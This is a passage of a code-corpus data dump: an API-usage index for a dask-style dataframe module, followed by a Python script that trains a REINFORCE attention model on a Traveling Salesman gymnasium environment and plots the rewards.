"pandas.DataFrame", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.Index", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 52, "usage_type": "attribute"}, {"api_name": "optimize.optimize", "line_number": 61, "usage_type": "call"}, {"api_name": "base.Base", "line_number": 68, "usage_type": "name"}, {"api_name": "optimize.optimize", "line_number": 74, "usage_type": "argument"}, {"api_name": "numpy.asarray", "line_number": 89, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 101, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 103, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 112, "usage_type": "call"}, {"api_name": "base.Base", "line_number": 115, "usage_type": "argument"}, {"api_name": "toolz.merge", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "attribute"}, {"api_name": "base.Base", "line_number": 136, "usage_type": "name"}, {"api_name": "optimize.optimize", "line_number": 139, "usage_type": "argument"}, {"api_name": "toolz.merge", "line_number": 170, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 183, "usage_type": "call"}, {"api_name": "chest.Chest", "line_number": 189, "usage_type": "name"}, {"api_name": "uuid.uuid1", "line_number": 198, "usage_type": "call"}, {"api_name": "operator.setitem", "line_number": 199, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 201, "usage_type": "call"}, {"api_name": "operator.getitem", "line_number": 205, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 209, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.random.RandomState", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 253, 
"usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 253, "usage_type": "attribute"}, {"api_name": "operator.getitem", "line_number": 260, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 263, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 277, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 280, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 293, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 296, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 326, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 346, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 361, "usage_type": "call"}, {"api_name": "utils.IndexCallable", "line_number": 370, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 403, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 417, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 417, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 422, "usage_type": "attribute"}, {"api_name": "numpy.random.RandomState", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 423, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 424, "usage_type": "attribute"}, {"api_name": "compatibility.apply", "line_number": 428, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 432, "usage_type": "call"}, {"api_name": "io.to_hdf", "line_number": 439, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 435, "usage_type": "attribute"}, {"api_name": "io.to_csv", "line_number": 445, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 442, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 442, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 469, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 469, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 479, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 479, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 489, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 489, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 499, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 499, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 526, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 527, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 510, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 510, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 550, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 530, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 530, 
"usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 564, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 554, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 554, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 575, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 581, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 588, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 592, "usage_type": "attribute"}, {"api_name": "multi._pdconcat", "line_number": 597, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 617, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 625, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 637, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 628, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 628, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 648, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 639, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 639, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 659, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 659, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 664, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 650, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 650, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 675, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 675, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 680, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 666, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 666, "usage_type": "attribute"}, {"api_name": "base.normalize_token.register", "line_number": 688, "usage_type": "call"}, {"api_name": "base.normalize_token", "line_number": 688, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 702, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 752, "usage_type": "attribute"}, {"api_name": "utils.repr_long_list", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 760, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 766, "usage_type": "call"}, {"api_name": "array.core", "line_number": 766, "usage_type": "argument"}, {"api_name": "pandas.Series", "line_number": 804, "usage_type": "call"}, {"api_name": "pandas.datetools.Day", "line_number": 814, "usage_type": "call"}, {"api_name": "pandas.datetools", "line_number": 814, "usage_type": "attribute"}, {"api_name": "pandas.datetools.to_offset", "line_number": 816, "usage_type": "call"}, {"api_name": "pandas.datetools", "line_number": 816, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 823, "usage_type": "attribute"}, {"api_name": "operator.getitem", "line_number": 833, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 836, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 840, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 840, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 857, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 
860, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 860, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 864, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 864, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 868, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 868, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 872, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 872, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 876, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 876, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 880, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 880, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 884, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 884, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 888, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 888, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 892, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 892, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 896, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 896, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 900, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 900, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 904, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 904, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 908, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 908, "usage_type": "attribute"}, {"api_name": "distutils.version.LooseVersion", "line_number": 915, "usage_type": "call"}, {"api_name": "pandas.__version__", "line_number": 915, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 912, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 912, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 922, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 922, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 928, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 926, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 926, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 932, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 930, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 930, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 936, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 934, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 934, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 940, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 938, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 938, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 944, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 942, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 942, 
"usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 949, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 947, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 947, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 953, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 951, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 951, "usage_type": "attribute"}, {"api_name": "io.to_bag", "line_number": 965, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 970, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 967, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 967, "usage_type": "attribute"}, {"api_name": "compatibility.bind_method", "line_number": 982, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 988, "usage_type": "attribute"}, {"api_name": "pandas.notnull", "line_number": 1009, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "numpy.isscalar", "line_number": 1058, "usage_type": "call"}, {"api_name": "operator.getitem", "line_number": 1061, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1063, "usage_type": "call"}, {"api_name": "operator.getitem", "line_number": 1070, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1074, "usage_type": "call"}, {"api_name": "multi._maybe_align_partitions", "line_number": 1081, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1087, "usage_type": "call"}, {"api_name": "utils.repr_long_list", "line_number": 1106, "usage_type": "call"}, {"api_name": "shuffle.set_index", "line_number": 1121, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1118, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1118, "usage_type": "attribute"}, {"api_name": "shuffle.set_partition", "line_number": 1132, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1146, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1146, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1158, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1153, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1153, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1167, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1163, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1163, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1185, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 1188, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 1189, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1189, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1193, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1196, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1199, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1199, "usage_type": "attribute"}, {"api_name": "io.to_castra", "line_number": 1215, "usage_type": "call"}, {"api_name": 
"base.compute", "line_number": 1216, "usage_type": "name"}, {"api_name": "io.to_bag", "line_number": 1228, "usage_type": "call"}, {"api_name": "pandas.util.decorators.cache_readonly", "line_number": 1230, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1240, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1236, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1236, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1271, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1274, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1266, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1266, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "multi.merge", "line_number": 1285, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1276, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "multi.merge", "line_number": 1298, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1290, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1290, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 1323, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1325, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1329, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1330, "usage_type": "call"}, {"api_name": "compatibility.bind_method", "line_number": 1338, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1360, "usage_type": "attribute"}, {"api_name": "operator.abs", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "operator.add", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "operator.and_", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "compatibility.operator_div", "line_number": 1365, "usage_type": "name"}, {"api_name": "operator.eq", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.gt", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.inv", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.mod", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.neg", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.or_", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.pow", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.sub", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "operator.truediv", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "operator.floordiv", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "operator.xor", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "{'to_hdf': 'io.to_hdf', 'to_csv': 'io.to_csv', '_pdconcat': 
'multi._pdconcat'}._bind_operator", "line_number": 1370, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1377, "usage_type": "attribute"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}._bind_operator_method", "line_number": 1378, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1380, "usage_type": "attribute"}, {"api_name": "{'to_bag': 'io.to_bag'}._bind_operator_method", "line_number": 1381, "usage_type": "call"}, {"api_name": "toolz.partial", "line_number": 1389, "usage_type": "call"}, {"api_name": "toolz.partition", "line_number": 1406, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 1426, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1465, "usage_type": "argument"}, {"api_name": "pandas.Timestamp", "line_number": 1466, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 1467, "usage_type": "attribute"}, {"api_name": "numpy.datetime64", "line_number": 1468, "usage_type": "call"}, {"api_name": "toolz.first", "line_number": 1487, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1497, "usage_type": "call"}, {"api_name": "multi._maybe_align_partitions", "line_number": 1502, "usage_type": "call"}, {"api_name": "array.core.partial_by_order", "line_number": 1512, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1521, "usage_type": "call"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}", "line_number": 1524, "usage_type": "call"}, {"api_name": "{'to_bag': 'io.to_bag'}", "line_number": 1528, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1573, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1583, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 1592, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1593, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1601, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1611, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 1611, "usage_type": "attribute"}, {"api_name": "io.from_pandas", "line_number": 1611, "usage_type": "call"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}._validate_axis", "line_number": 1682, "usage_type": "call"}, {"api_name": "multi.concat_indexed_dataframes", "line_number": 1691, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1696, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1706, "usage_type": "call"}, {"api_name": "multi.concat_indexed_dataframes", "line_number": 1711, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1724, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1730, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1767, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1791, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1791, "usage_type": "attribute"}, 
{"api_name": "functools.wraps", "line_number": 1795, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1795, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1799, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1799, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1803, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1803, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1808, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1808, "usage_type": "attribute"}, {"api_name": "shuffle.shuffle", "line_number": 1870, "usage_type": "call"}, {"api_name": "{'shuffle': 'shuffle.shuffle'}", "line_number": 1880, "usage_type": "call"}, {"api_name": "shuffle.shuffle", "line_number": 1936, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1946, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 1987, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 1991, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2008, "usage_type": "call"}, {"api_name": "compatibility.unicode", "line_number": 2024, "usage_type": "name"}, {"api_name": "collections.Iterable", "line_number": 2025, "usage_type": "argument"}, {"api_name": "base.tokenize", "line_number": 2048, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 2053, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2054, "usage_type": "call"}, {"api_name": "multi._maybe_align_partitions", "line_number": 2062, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 2070, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2075, "usage_type": "call"}, {"api_name": "collections.Iterator", "line_number": 2080, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 2084, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 2086, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 2087, "usage_type": "call"}, {"api_name": "pandas.Categorical", "line_number": 2100, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 2118, "usage_type": "call"}, {"api_name": "toolz.partial", "line_number": 2120, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 2136, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 2149, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 2150, "usage_type": "call"}, {"api_name": "{'to_bag': 'io.to_bag'}", "line_number": 2154, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 2154, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 2157, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 2157, "usage_type": "call"}, {"api_name": "dask.array.percentile._percentile", "line_number": 2160, "usage_type": "name"}, {"api_name": "dask.array.percentile.merge_percentiles", "line_number": 2166, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2168, "usage_type": "call"}, {"api_name": "utils.pseudorandom", "line_number": 2192, "usage_type": "call"}, {"api_name": "toolz.unique", "line_number": 2237, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 2336, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 2337, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 2368, "usage_type": "call"}, {"api_name": "toolz.merge", 
"line_number": 2374, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 2376, "usage_type": "attribute"}, {"api_name": "utils.shard_df_on_index", "line_number": 2378, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 2380, "usage_type": "attribute"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}", "line_number": 2381, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 2382, "usage_type": "attribute"}, {"api_name": "{'to_bag': 'io.to_bag'}", "line_number": 2383, "usage_type": "call"}, {"api_name": "toolz.partial", "line_number": 2412, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 2424, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 2444, "usage_type": "attribute"}]} +{"seq_id": "9253023309", "text": "import sys\nimport warnings\n\nimport gymnasium as gym\n\nimport combinatorial_problems\nimport torch\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom AttentionModel import REINFORCE, AttentionModel\n\nimport tqdm\n\nwarnings.filterwarnings(\"ignore\")\n\nnodes = 20\n\ntotal_episodes = 1_000\n\ndevice = 'cuda'\n\ntorch.autograd.set_detect_anomaly(True)\n\n# Attention Model Parameters\nd_m = 128\nd_c = d_m * 2\nd_k = 128\nh = 8\nN = 3\nd_ff = 128\nn_nodes = nodes\nembeder = 2\nd_v = 128\nc = 10.\nhead_split = True\ndropout = 0.\nuse_graph_emb = True\n\nsamples = 1_024\nbatches = 512\nepochs = 10\nepochs *= 1_250 #\n\nassert samples % batches == 0, f\"Number of samples is not divisible by specified batches: {samples} % {batches} = {samples % batches}.\"\n# List of environments. Use .reset({\"new\": False}) to reuse same environment. 
Useful for Training, Validation comparisons\n# We reset them here already, as we want to keep the unique graphs generated here.\nbatched_envs = [\n gym.vector.make(\"combinatorial_problems/TravelingSalesman-v0\",\n num_nodes=nodes,\n num_envs=batches,\n new_on_reset=False) for batch in range(samples // batches)\n]\n\nrewards_over_epochs = []\n\nagent = AttentionModel(d_m=d_m,\n d_c=d_c,\n d_k=d_k,\n h=h,\n N=N,\n d_ff=d_ff,\n n_nodes=n_nodes,\n embeder=embeder,\n d_v=d_v,\n c=c,\n head_split=head_split,\n dropout=dropout,\n use_graph_emb=use_graph_emb,\n batches=batches).to(device)\nam_REINFORCE = REINFORCE(policy=agent,\n optimizer=torch.optim.AdamW,\n lr=1e-4,\n gamma=0.99,\n beta=0.9,\n gradient_clip=(1., torch.inf),\n eps=1e-9).to(device)\nfor epoch in range(epochs):\n rewards_over_batches = []\n for env in tqdm.tqdm(batched_envs, file=sys.stdout):\n # Apply seeds\n state, info = env.reset()\n start_idx = info[\"agent_start_idx\"]\n done = False\n batch_rewards = 0\n while not done:\n # graph -> b x n_nodes x coords\n graph_nodes = np.stack(info[\"nodes\"])\n graph = torch.FloatTensor(graph_nodes).reshape(batches, nodes, 2).to(device)\n # The context will be the concatenation of the node embeddings for first and last nodes.\n # use am_REINFORCE.policy.encode\n # tmb_emb -> b x nodes x d_m\n tmp_emb = am_REINFORCE.policy.encoder(graph).detach()\n # start/end_node -> b x 1 x d_m\n start_node = tmp_emb[np.arange(batches),start_idx,:].unsqueeze(1)\n end_node = tmp_emb[np.arange(batches),start_idx,:].unsqueeze(1)\n # ctxt -> b x 1 x d_c (2 * d_m)\n ctxt = torch.cat([start_node, end_node], dim=-1)\n # For now, I will not use a mask for the embedding input.\n # mask_emb_graph -> b x 1 x nodes\n mask_emb_graph = torch.zeros(batches, 1, nodes).bool().to(device) # Empty Mask!\n # mask_dex_graph -> b x 1 x nodes\n masks = np.stack(info[\"mask\"])\n mask_dec_graph = torch.tensor(masks).unsqueeze(1).to(device)\n reuse_embeding = False\n\n action = am_REINFORCE(graph=graph,\n ctxt=ctxt,\n mask_emb_graph=mask_emb_graph,\n mask_dec_graph=mask_dec_graph,\n reuse_embeding=reuse_embeding,\n explore=True).numpy()\n state, reward, terminated, truncated, info = env.step(action)\n am_REINFORCE.rewards.append(reward)\n batch_rewards += reward\n done = terminated.all() or truncated.all()\n rewards_over_batches.append(np.array(batch_rewards).mean())\n am_REINFORCE.update()\n rewards_over_epochs.append(np.mean(np.array(rewards_over_batches)))\n if epoch % 1 == 0:\n avg_reward = np.mean(rewards_over_epochs[-1:])\n print(f\"Epoch: {epoch} with Average Reward {avg_reward} for last epoch\",)\n\n# Maybe add testing, using argmax!\n# Why is the plotted graph different from what is being reported?\n\nrewards_to_plot = [[batch_r] for batch_r in rewards_over_epochs]\ndf1 = pd.DataFrame(rewards_to_plot, columns=[\"Train\"]).plot()\nplt.title(\"Attention Model Training.\")\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Rewards\")\nplt.xticks(range(epochs))\nplt.show()\n\nfor env in batched_envs:\n env.close()\n del env", "repo_name": "aguilarjose11/PytorchAMD", "sub_path": "AM_TSP.py", "file_name": "AM_TSP.py", "file_ext": "py", 